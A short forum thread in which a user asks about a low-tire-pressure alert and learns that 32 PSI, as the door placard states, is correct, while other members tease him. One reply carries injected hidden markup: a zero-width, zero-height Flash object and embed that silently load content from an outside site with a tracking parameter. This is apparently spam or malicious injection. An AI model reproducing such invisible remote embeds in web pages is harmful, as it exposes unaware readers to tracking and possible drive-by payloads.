Tire Pressure, need help!

sbreaux26

Aug 21, 2001
Baton Rouge, LA
So I am parking my car yesterday and the "Low Tire Pressure" alert comes on. I waited a couple of hours to check the pressure so I could get an accurate cold pressure reading. Each tire had about 25 PSI of pressure. I thought this was low so I checked the door and it says I should have 32 PSI.

Should I have 32 PSI? It seems kinda strange that every tire would be low and I am just getting the alert. Thanks

• Sponsors (?)

25 is too low (unless at the drag strip) and by going back up to 32, you may find an increase in MPG, tire life and handling as the sidewall won't be rolling over on turns:nice:

My bad I meant that all four tires losing that same amount of air pressure was normal.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Thanks for the responses. I put pressure in the tires and everything is back to normal :D

yeah i was trying to be nice but that is f'n hysterical.:rlaugh:

Ha Ha Ha, I am glad I can give you gals some entertainment:rlaugh: It does sound pretty silly reading it. I was concerned that every tire was low (25 PSI) and maybe the door was wrong. (which was pretty stupid to think also). I guess we all have our moments of mental ambiguity (see, I threw in a big word to make myself look smart)

Originally Posted by sbreaux26 View Post
the door says I should have 32 PSI.

Should I have 32 PSI?
...., ... wait...., ... :rlaugh:

This is probably my favorite new quote.:hail2:
oh, I thought the correct amount was 32 PSI...I don't know how I missed that!:rlaugh:
Seriously though, we almost all make mistakes of very minor things at times...I know I do as I'm blonde:D Besides, laughter is good for you!